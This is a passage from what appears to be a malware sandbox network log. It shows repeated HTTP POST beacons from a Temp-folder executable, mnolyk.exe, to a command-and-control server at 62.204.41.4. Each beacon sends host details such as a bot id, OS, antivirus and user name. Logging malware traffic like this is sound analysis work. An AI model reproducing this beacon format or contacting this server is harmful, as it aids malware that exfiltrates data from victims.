                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.287807941 CET605INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      16192.168.2.74974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:01.508138895 CET448OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.572156906 CET448INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      160192.168.2.74988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:39.465156078 CET606OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.527257919 CET606INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      161192.168.2.74988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:39.694820881 CET607OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.759475946 CET607INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      162192.168.2.74988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:39.931255102 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.997347116 CET608INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      163192.168.2.74988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:40.164302111 CET609OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.229357958 CET609INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      164192.168.2.74989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:40.402321100 CET610OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.467500925 CET610INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      165192.168.2.74989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:40.650923967 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.715030909 CET611INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      166192.168.2.74989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:40.888978958 CET612OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.951904058 CET612INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      167192.168.2.74989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:41.133872032 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.200634956 CET613INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      168192.168.2.74989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:41.381592989 CET614OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.445008993 CET614INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      169192.168.2.74989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:41.619812965 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.683928013 CET615INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      17192.168.2.74974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:01.744620085 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.808621883 CET449INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      170192.168.2.74989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:41.854218006 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.918668985 CET616INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      171192.168.2.74989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:42.089660883 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.155524969 CET617INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      172192.168.2.74989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:42.338053942 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.403964043 CET618INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      173192.168.2.74989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:42.575366020 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.640623093 CET619INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      174192.168.2.74990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:42.821924925 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.888844013 CET620INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      175192.168.2.74990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:43.063640118 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.127892017 CET621INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      176192.168.2.74990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:43.303335905 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.368645906 CET622INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
